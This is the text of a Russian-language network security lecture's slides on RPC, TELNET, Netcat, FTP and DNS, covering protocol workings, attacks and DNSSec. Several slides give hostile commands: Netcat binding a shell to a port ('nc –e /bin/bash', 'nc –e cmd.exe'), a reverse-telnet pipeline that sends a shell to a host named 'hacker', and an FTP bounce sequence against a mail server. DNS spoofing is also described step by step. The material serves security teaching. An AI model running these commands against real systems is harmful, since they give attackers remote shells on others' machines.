Содержание
-
Протоколы прикладного уровня Раздел 2 – Тема 15
-
Клиент Сервер Протокол обмена TELNET FTP HTTP Реализация служб прикладного уровня Уровень сетевого взаимодействия
-
Удалённый вызов процедур Канальный уровень Физический уровень Сетевой уровень Транспортный уровень Уровень соединения Уровень представления Уровень приложения 7 6 5 4 3 2 1 Ethernet, FDDI, X.25 и другие Сетевой уровень IP TCP, UDP RPC
-
Клиент Сервер RPC Протокол RPC Спецификация RPC-сервера Номер программы Номер процедуры Номер версии
-
Клиент Сервер RPC Запрос клиента Спецификация RPC-сервера Номер программы Номер процедуры Номер версии Номер порта
-
Клиент Сервер RPC Номер процедуры RPC-сканирование Номер порта Примеры утилит для RPC-сканирования RPCScan (Linux) rpcdump (Windows)
-
Клиент (утилита telnet) Сервер (telnetd) Протокол обмена TELNET Протокол удалённого терминала - TELNET
-
Взаимодействие «терминал-удалённый процесс» Терминал – Серверный процесс $a a a a
-
Команды протокола TELNET Управляющий символ IAC Команда Параметры Interpret as Command, равен 255 Например, клавиша Backspace, 247 1 байт 1 байт 1 байт
-
Команды протокола TELNET Название команды Код Описание команды IP (Interrupt Process) 244 Прерывание процесса пользователя AO (Abort Output) 245 Остановка вывода на дисплей AYT (Are You There) 246 Проверка состояния системы EC (Erase Character) 247 Удаление последнего введённого символа EL (Erase Line) 248 Удаление текущей строки
-
Передача команд $a IAC EC Backspace $
-
Клиент (утилита telnet) Сервер (telnetd) Передача имени и пароля в открытом виде Уязвимости протокола TELNET
-
Изменение переменных окружения до аутентификации Уязвимости протокола TELNET Клиент (утилита telnet) Сервер (telnetd)
-
Что такое Netcat? Netcat - это утилита, которая позволяет читать и записывать данные по сети с использованием протоколов TCP или UDP. Возможности netcat : Работа с входящими и исходящими TCP или UDP соединениями, использующими любые порты Выполнение DNS запросов различных типов Возможность задания порта источника Возможность использования любого адреса источника (из локально сконфигурированных) Возможности по сканированию портов Работа в качестве telnet-сервера
-
Netcat и Telnet - клиент Telnet - клиентимеет ограничения, преодолеть которые поможет Netcat. Например: Ограничения стандартного потока ввода Посылка сообщений об ошибках в стандартный поток вывода, вместе с данными Невозможность посылки двоичных данных Невозможность находиться в состоянии ожидания соединения Невозможность работы с UDP
-
Режимы работы Netcat Режим исходящих соединений Режим ожидания входящих соединений Слушающий порт nc [-опции] порт[ы] nc –l –p [-опции] [узел] [порт]
-
Варианты использования Netcat Подключение к слушающему портуна удаленном узле Подключение с явным указанием порта источника nc 200.2.2.222 80 nc –p 53 200.2.2.222 80 53 200.2.2.222 80 200.2.2.222
-
Варианты использования Netcat Открытие порта и подключение оболочки к нему nc –e /bin/bash nc –e cmd.exe Вариант для Linux Вариант для Windows
-
«Обращённый» TELNET Это управление узлом через соединение, инициируемое с него самого
-
«Обращённый» TELNET 80 25 > telnet hacker 80 | /bin/bash | telnet hacker 25 /bin/bash Команды Результаты
-
Практическая работа 18 Утилита Netcat «Обращённый» TELNET
-
Клиент Сервер Команды Ответы Реализация службы FTP Интерфейс пользователя Модуль управления передачей Модуль передачи данных Данные Модуль управления передачей Модуль передачи данных
-
Пассивный вариант работы FTP Клиент Сервер (ftpd) команда PASV Ответ с параметрами (номер порта для подключения) Открытие соединения на указанный порт
-
Предсказуемый номер порта Клиент Сервер (ftpd) команда PASV Ответ с параметрами (номер порта для подключения) Открытие соединения на указанный порт Подключение раньше клиента
-
Открытие большого количества портов Сервер (ftpd) команда PASV Ответ с параметрами (номер порта для подключения) команда PASV Ответ с параметрами (номер порта для подключения) команда PASV Ответ с параметрами (номер порта для подключения)
-
Передача данных между двумя FTP-серверами Сервер (ftpd) Сервер (ftpd) Передача большого количества данных Управляющее соединение
-
Атаки на сетевые службы при помощи FTP Сервер FTP Почтовый сервер Подключение с FTP-сервера PORT 20,1,1,1,0,25 RETR 20.1.1.1 25
-
telnet www.microsoft.com Resolver www.microsoft.com - ? 100.0.0.6 DNS Server DNS - служба
-
Домены и поддомены « » org edu com company sale buhg Root Name Server company.com Name Server sale.company.com Name Server
-
Записи Resource Record main.sale.company.com. IN A 100.0.0.120 sale sale.company.com Name Server sale.company.com. IN NS ns.sale.company.com
-
Разрешение имён R e s o l v e r main.sale.company.com - ? main.sale.company.com - ? main.sale.company.com - ? main.sale.company.com - ? com Name Server Root Server company.com NS sale.company.com NS
-
Применение транспортного протокола без установления соединения (UDP) Отсутствие идентификации и аутентификации Отсутствие средств разграничения доступа Уязвимости службы DNS
-
Пример атаки на IP - сеть: Атака на DNS Нарушение нормального функционирования объекта атаки Местонахождение атакующего В одном сегменте с объектом атаки Используемые уязвимости Цель Слабая защищённость протокола DNS - - недостаток проектирования Степень риска Высокая Нарушение навигации (ложный маршрут) Механизм реализации
-
Схема работы DNS - протокола DNS-сервер Хост А IP - адрес ID Имя компьютера SourcePort DNS-запрос DNS-ответ ID - генерируется приложением, пославшим запрос, обычно=1 SourcePort вначале принимает значение 1024 а потом увеличивается Пример атаки на IP - сеть: Атака на DNS
-
DNS-сервер Хост А ID Имя компьютера SourcePort DNS-запрос Хост А посылает DNS - запрос Нарушитель должен находиться в одной подсети с А или в одной подсети с DNS - сервером Это позволит ему перехватить пакет с запросом Пример атаки на IP - сеть: Атака на DNS
-
DNS-сервер Хост А DNS-запрос Нарушитель извлекает из запроса ID и SourcePort Ложный DNS - ответ: от имени настоящего DNS - сервера, но в качестве IP - адреса искомого узла указывается IP - адрес нарушителя Результат: хост А имеет неправильное соответствие между именем компьютера и IP - адресом Пример атаки на IP - сеть: Атака на DNS
-
Хост А Узел сети Теперь путь пакета от хоста А до узла сети будет лежать через хост нарушителя Пример атаки на IP - сеть: Атака на DNS
-
Пример атаки на IP - сеть: Атака на DNS (вариант 2) Нарушение нормального функционирования объекта атаки Местонахождение атакующего В разных сегментах с объектом атаки Используемые уязвимости Цель Слабая защищённость протокола DNS - - недостаток проектирования Степень риска Высокая Нарушение навигации (ложный маршрут) Механизм реализации
-
DNS-сервер Хост А ID IP - адрес DestPort Ложные DNS - ответы Перебор Пример атаки на IP - сеть: Атака на DNS (вариант 2)
-
DNS-сервер Хост А Ложные DNS - ответы Пример атаки на IP - сеть: Атака на DNS (вариант 2)
-
Хост А Узел сети Теперь путь пакета от хоста А до узла сети будет лежать через хост нарушителя Пример атаки на IP - сеть: Атака на DNS (вариант 2)
-
DNS-сервер 193.233.70.129 ertr.mpei.ac.ru . . Кэш - таблица DNS-сервер следующего уровня DNS-запрос DNS-ответ 194.154.77.109 www.infosec.ru Пример атаки на IP - сеть: Атака на DNS (вариант 3)
-
DNS-сервер 193.233.70.129 ertr.mpei.ac.ru . . Кэш - таблица DNS-сервер следующего уровня DNS-запрос 194.154.77.123 www.infosec.ru Ложные DNS - ответы Пример атаки на IP - сеть: Атака на DNS (вариант 3)
-
DNS-сервер 193.233.70.129 ertr.mpei.ac.ru . . Кэш - таблица 194.154.77.123 www.infosec.ru Хост А 194.154.77.123 www.infosec.ru DNS-запрос DNS-ответ Пример атаки на IP - сеть: Атака на DNS (вариант 3)
-
DNS в корпоративной сети Внешний узел Вторичный сервер Внутренний узел Первичный сервер Репликация Рекурсивный запрос Рекурсивные запросы Итеративные запросы DNS DNS
-
DNS в корпоративной сети Доступ узлов корпоративной сети к полной информации о внутренних именах Доступ отдельных узлов корпоративной сети к глобальному пространству имён Internet Доступ внешних узлов к минимально необходимой информации о внутренних именах
-
Двухсерверная конфигурация Внешний узел Вторичный сервер Внутренний узел Первичный сервер (минимальная версия) Репликация Рекурсивный запрос Рекурсивный запрос Итеративные запросы Межсетевой экран Первичный сервер (полная версия) DNS DNS DNS
-
Трехсерверная конфигурация Внешний узел Вторичный сервер (минимальная версия) Внутренний узел (с Internet) Первичный сервер (минимальная версия) Репликация Рекурсивный запрос Рекурсивный запрос Итеративные запросы Межсетевой экран Первичный сервер (полная версия+корень) DNS DNS DNS DNS Вторичный сервер (полная версия) Внутренний узел (без Internet)
-
Трёхсерверная конфигурация Первичный сервер (минимальная версия) Межсетевой экран Первичный сервер (полная версия) +корень DNS DNS DNS Вторичный сервер (полная версия) Internet
-
Протокол DNSSec Механизм распределения открытых ключей Целостность и аутентичность информации DNS Аутентификация транзакции
-
Новые записи Resource Record main.sale.company.com. IN A 100.0.0.120 sale.company.com. IN NS ns.sale.company.com sale.company.com. IN KEY [ключ] sale.company.com. IN SIG [подпись] sale.company.com. IN NXT [домен]
-
Обычный DNS-запрос qname=main.sale.company.com qtype=A main.sale.company.com A 100.0.0.120 Владелец sale.company.com NS ns.sale.company.com Дополнительно ns.sale.company.com A 100.0.1.130 Запрос Ответ
-
Запрос DNSSec qname=main.sale.company.com qtype=A Вопрос main.sale.company.com A ? main.sale.company.com A 100.0.0.120 main.sale.company.com SIG [подпись] Владелец sale.company.com NS ns.sale.company.com sale.company.com SIG [подпись] Дополнительно ns.sale.company.com A 100.0.1.130 ns.sale.company.com SIG [подпись] sale.company.com KEY [ключ] main.sale.company.com KEY [ключ] ns.sale.company.com KEY [ключ] Запрос Ответ
-
Практическая работа 19 Просмотр и запись сессий TELNET и FTP при помощи RealSecure Настройка пользовательских событий для RealSecure
-
Раздел 2 – Итоги Модель OSI. Архитектура TCP/IP. Сетевые анализаторы. Программа Internet Scanner. Межсетевые экраны. Протоколы IPSec, SSL, SSH, DNSSec Система обнаружения атак RealSecure. Cлужбы прикладного уровня.
Нет комментариев для данной презентации
Помогите другим пользователям — будьте первым, кто поделится своим мнением об этой презентации.